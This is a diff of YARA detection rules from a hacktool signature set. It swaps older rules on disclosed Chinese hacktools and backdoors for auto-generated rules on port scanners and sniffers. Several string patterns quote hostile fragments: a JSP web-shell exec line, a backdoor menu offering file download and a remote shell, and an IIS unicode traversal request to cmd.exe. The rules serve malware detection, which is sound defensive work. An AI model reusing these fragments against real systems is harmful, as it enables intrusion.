+		id = "3e8960ce-0428-51e1-b992-4fa09fee8520"
+		date = "2016-02-15"
 		modified = "2025-12-18"
+		old_rule_name = "PortScanner"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1801-L1817"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L165-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
-		logic_hash = "844e260870f075b0afae0667691e61ab8f138a29871f9a18d1f2b623f9bb9e2a"
-		score = 60
+		hash = "b381b9212282c0c650cb4b0323436c63"
+		logic_hash = "c69269b227d46b5b970cfc094b3154b0a533b439b8ed492a2059025bc96d17a0"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$s0 = "Scan Ports Every"
+		$s3 = "Scan All Possible Ports!"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Editkeylogreadme
+rule SIGNATURE_BASE_Domainscanv1_0
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file DomainScanV1_0.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "94ead827-8b29-5cb5-82b6-a7ca5087bf7e"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1819-L1837"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L179-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
-		logic_hash = "a58a2336e7d714a2e7f60eec8dacbee9a7190552dd791d8b6eba084ffaf0904a"
-		score = 60
-		quality = 35
+		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+		logic_hash = "b06d902528fee5d1718d0a2984af3314e92e1ec7033c7596f9fb0e51a20eb848"
+		score = 75
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
-		$s1 = "WinEggDrop.DLL" fullword ascii
-		$s2 = "nc.exe" fullword ascii
-		$s3 = "KeyLog.exe" fullword ascii
-		$s4 = "EditKeyLog.exe" fullword ascii
-		$s5 = "wineggdrop" fullword ascii
+		$s0 = "dIJMuX$aO-EV"
+		$s1 = "XELUxP\"-\\"
+		$s2 = "KaR\"U'}-M,."
+		$s3 = "V.)\\ZDxpLSav"
+		$s4 = "Decompress error"
+		$s5 = "Can't load library"
+		$s6 = "Can't load function"
+		$s7 = "com0tl32:.d"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Passsniffer_Zip_Folder_Readme
+rule SIGNATURE_BASE_HKTL_Moorer_Port_Scanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file readme.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file MooreR Port Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5d8fb83f-bed3-53d2-bd33-2158911dc7c8"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1839-L1854"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L198-L211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
-		logic_hash = "d9e6cd2ba7e98481664b0560184a07349bb471dd370c4b73ef5f5f05a8e89946"
-		score = 60
+		hash = "376304acdd0b0251c8b19fea20bb6f5b"
+		logic_hash = "248f437964fc6f7836f6b4c87e1f35bb1bac25a1a484cdf1a4065e7efb823b51"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PassSniffer.exe" fullword ascii
-		$s1 = "POP3/FTP Sniffer" fullword ascii
-		$s2 = "Password Sniffer V1.0" fullword ascii
+		$s0 = "Description|"
+		$s3 = "soft Visual Studio\\VB9yp"
+		$s4 = "adj_fptan?4"
+		$s7 = "DOWS\\SyMem32\\/o"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Gina
+rule SIGNATURE_BASE_Netbios_Name_Scanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.reg"
-		author = "Florian Roth (Nextron Systems)"
-		id = "85c19493-e6d4-55e8-8526-6817243e90cf"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "03716e00-a969-5ab5-9be7-e8fc4272e40f"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1856-L1871"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L213-L225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
-		logic_hash = "f0ece7406a31f5a4212da5c4144233c5c45b8120d09267fdf7e291d6c9827384"
-		score = 60
+		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+		logic_hash = "19b40a283b74317fece2f5be0ee3e38227d9631eebbc7efb0ea19056b52630f1"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
-		$s1 = "REGEDIT4" fullword ascii
-		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+		$s0 = "IconEx"
+		$s2 = "soft Visual Stu"
+		$s4 = "NBTScanner!y&"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Splitjoin
+rule SIGNATURE_BASE_Felikspack3___Scanners_Ipscan
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2f1a69cd-34b3-5af0-a054-fe19d9becb25"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "8360b268-3434-5142-9248-40b7a1589be9"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1873-L1889"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L227-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
-		logic_hash = "dede4518ed9be28e89bc67dab4e68503383c16746f088f37a4c8069e256183ca"
-		score = 60
+		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+		logic_hash = "8da10a4536ecea889f29bb3f098518580629bf48eda88db7adfc5f61738ede25"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Not for distribution without the authors permission" fullword wide
-		$s2 = "Utility to split and rejoin files.0" fullword wide
-		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
-		$s19 = "SplitJoin" fullword wide
+		$s2 = "WCAP;}ECTED"
+		$s4 = "NotSupported"
+		$s6 = "SCAN.VERSION{_"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Editkeylog
+rule SIGNATURE_BASE_Cgisscan_Cgiscan
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file CGIScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "60bd5038-a308-55fd-85bb-2c4183f1c951"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1891-L1907"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L241-L253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
-		logic_hash = "0efb173598117857c5bf7894f017d655653e843dd0a44439d1b10b7e5c59b248"
-		score = 60
+		hash = "338820e4e8e7c943074d5a5bc832458a"
+		logic_hash = "5bd856a77c53616cf78d093462f8b7ca5a5fb0924406a02941d86bdb015a1fbc"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Press Any Ke" fullword ascii
-		$s2 = "Enter 1 O" fullword ascii
-		$s3 = "Bon >0 & <65535L" fullword ascii
-		$s4 = "--Choose " fullword ascii
+		$s1 = "Wang Products" fullword wide
+		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+		$s3 = "tcp is the only protocol supported thru socks server"
 
 	condition:
-		all of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_Passsniffer
+rule SIGNATURE_BASE_IP_Stealing_Utilities
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file IP Stealing Utilities.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "3a947e9c-d707-5819-88f2-059585750048"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1909-L1927"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L255-L266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
-		logic_hash = "771b45473c48618c43c6be84dd37b2ccb23643f1674d437763cb78ce560067c0"
-		score = 60
+		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
+		logic_hash = "38958edeee6e140e11267cdd7899ad517799dbce33ac267d51dea0f8aecfa1ee"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Sniff" fullword ascii
-		$s3 = "GetLas" fullword ascii
-		$s4 = "VersionExA" fullword ascii
-		$s10 = " Only RuntUZ" fullword ascii
-		$s12 = "emcpysetprintf\\" ascii
-		$s13 = "WSFtartup" fullword ascii
+		$s0 = "DarkKnight"
+		$s9 = "IPStealerUtilities"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Aspfile2
+rule SIGNATURE_BASE_Superscan4
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42bbcc16-a6d7-53d7-8651-1a28c6b26ee8"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file SuperScan4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "bd353382-ffa2-56c5-b842-1ffc94d6849e"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1929-L1945"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L268-L281"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
-		logic_hash = "0fd52e646751b14840f30100382c5171fd001c05110dccb4ac87be9b2c4b6131"
-		score = 60
+		hash = "78f76428ede30e555044b83c47bc86f0"
+		logic_hash = "7f76c59e85efac5c150f783606e2a9bdc8724c6afd9f9c6405d63f7467c72752"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "response.write \"command completed success!\" " fullword ascii
-		$s1 = "for each co in foditems " fullword ascii
-		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
-		$s19 = "<title>Hello! Welcome </title>" fullword ascii
+		$s2 = " td class=\"summO1\">"
+		$s6 = "REM'EBAqRISE"
+		$s7 = "CorExitProcess'msc#e"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Unpack_Rar_Folder_Injectt
+rule SIGNATURE_BASE_Portracer
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc7d1a36-1214-5a14-8589-9eb2339a8700"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file PortRacer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "54717938-2f4c-5442-b0ad-40b9acd1101a"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1947-L1970"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L283-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
-		logic_hash = "f9d682a9438f49cf8292c33e680537d8c2137b8cba2670430b92d0a620de85b9"
-		score = 60
+		hash = "2834a872a0a8da5b1be5db65dfdef388"
+		logic_hash = "f6ad85a8970b10e25becca76e17bff30cbc787ed45f331af4ecf9563ff11b65d"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
-		$s1 = "Explorer.exe" fullword ascii
-		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
-		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
-		$s4 = "The Port Is Out Of Range" fullword ascii
-		$s7 = "Fail To Set The Port" fullword ascii
-		$s11 = "\\psapi.dll" ascii
-		$s20 = "TInject.Dll" fullword ascii
-		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
-		$x2 = "injectt.exe" fullword ascii
+		$s0 = "Auto Scroll BOTH Text Boxes"
+		$s4 = "Start/Stop Portscanning"
+		$s6 = "Auto Save LogFile by pressing STOP"
 
 	condition:
-		(1 of ( $x* ) ) and ( 3 of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Jc_Wineggdrop_Shell
+rule SIGNATURE_BASE_Scanarator
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "219df3a1-fe1c-5d33-ab3e-1b3cbd104c9e"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file scanarator.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "dfc3ff29-03b4-58ca-bfe0-c6888fddab67"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1972-L1991"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L297-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
-		logic_hash = "af43980b4052cef56884e9d6bdbb12919f1a86420a3f189e30fba624ab37a420"
-		score = 60
+		hash = "848bd5a518e0b6c05bd29aceb8536c46"
+		logic_hash = "9400435470c26245cd814e1e39f275eb22566d66d1a72d4f3e618a6ad11bc8d9"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Sniffer.dll" fullword ascii
-		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
-		$s5 = "Fport.exe or mport.exe " fullword ascii
-		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
-		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
-		$s15 = ": Del www.exe                   " fullword ascii
-		$s20 = ":Dir *.exe                    " fullword ascii
+		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp1
+rule SIGNATURE_BASE_Aolipsniffer
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fa5128c5-efd5-55dd-880a-2952942e2035"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file aolipsniffer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "f7cc0f31-6ba4-504b-82de-0334257b8a95"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1993-L2011"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L309-L327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
-		logic_hash = "7ce1911d7524e9961f907f863b3966817bcad7a571c933dac6a76e1d8a1eeaf8"
-		score = 60
+		hash = "51565754ea43d2d57b712d9f0a3e62b8"
+		logic_hash = "e627b8ea85e4325714c98e93ad6147adfa600af548a80dce8548b7f5743733b5"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
-		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
-		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
-		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
-		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
-		$s15 = "sql=\"select * from scjh\" " fullword ascii
+		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+		$s1 = "dwGetAddressForObject"
+		$s2 = "Color Transfer Settings"
+		$s3 = "FX Global Lighting Angle"
+		$s4 = "Version compatibility info"
+		$s5 = "New Windows Thumbnail"
+		$s6 = "Layer ID Generator Base"
+		$s7 = "Color Halftone Settings"
+		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_QQ_Zip_Folder_QQ
+rule SIGNATURE_BASE__Bitchin_Threads_
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "30da6292-f670-5b73-985a-3028e20607be"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file =Bitchin Threads=.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "3a51e76c-b360-5f10-961c-ecc3ea3fa3c9"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2013-L2033"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L329-L340"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
-		logic_hash = "d2517c3646b9a3babfa767c5c57b4b576fda471c190ab66e1054c4de359713ad"
-		score = 60
-		quality = 35
+		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+		logic_hash = "f43fec37d9dc668b562838465e5696e502c638b207e7af6a77fac5a8b00e92a8"
+		score = 75
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
-		$s4 = "QQ2000b.exe" fullword wide
-		$s5 = "haoq@neusoft.com" fullword ascii
-		$s9 = "QQ2000b.exe" fullword ascii
-		$s10 = "\\qq2000b.exe" ascii
-		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
-		$s17 = "SOFTWARE\\HAOQIANG\\" ascii
+		$s0 = "DarKPaiN"
+		$s1 = "=BITCHIN THREADS"
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Unpack_Rar_Folder_Tback
+rule SIGNATURE_BASE_Cgis4_Cgis4
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f672f987-0d43-53df-8338-084907b6da16"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file cgis4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "98fbf445-b7a5-58fa-8f06-34be7321e2eb"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2035-L2063"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L342-L357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
-		logic_hash = "89f978742ab952b727a9a8dbab0cd88cfc07440e8c4f974dcfa14ed630083761"
-		score = 60
+		hash = "d658dad1cd759d7f7d67da010e47ca23"
+		logic_hash = "2cf3fc6447323cbefe5f5ad02271eeb4c271bb9784d2c29030858542a43fbb04"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
-		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
-		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
-		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
-		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
-		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
-		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
-		$s8 = "Shell                                 -->Get A Shell" fullword ascii
-		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
-		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
-		$s13 = "Online                                -->List All Connected IP" fullword ascii
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
-		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
-		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
-		$s19 = "Reboot                                -->Reboot The System" fullword ascii
-		$s20 = "Password Sniffering Is Not Running" fullword ascii
+		$s0 = ")PuMB_syJ"
+		$s1 = "&,fARW>yR"
+		$s2 = "m3hm3t_rullaz"
+		$s3 = "7Projectc1"
+		$s4 = "Ten-GGl\""
+		$s5 = "/Moziqlxa"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Cmd_2
+rule SIGNATURE_BASE_Portscan
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fae3c4a-aeeb-5e02-9071-3980a39a19a9"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file portscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "967d6e3b-ae0d-5f93-a20d-742fc010608d"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2065-L2082"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L359-L370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
-		logic_hash = "a794d6b60194a190bd8d549ad00cf90649a52d831fdc7539c68a1f6312609bc2"
-		score = 60
+		hash = "a8bfdb2a925e89a281956b1e3bb32348"
+		logic_hash = "d93b54ffc7416b5354304daf156908f11d7e320a91bd936e397a15ede63caae3"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
-		$s1 = "InputStream in = child.getInputStream();" fullword ascii
-		$s2 = "String cmd = request.getParameter(\"" ascii
-		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
-		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+		$s5 = "0    :SCAN BEGUN ON PORT:"
+		$s6 = "0    :PORTSCAN READY."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Rangescan
+rule SIGNATURE_BASE_Proport_Zip_Folder_Proport
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "143d9e1e-41e2-579a-beee-30da2cf068f7"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file ProPort.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "cd611f6c-42ed-5cd3-a6ab-7e0970925e61"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2084-L2101"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L372-L389"
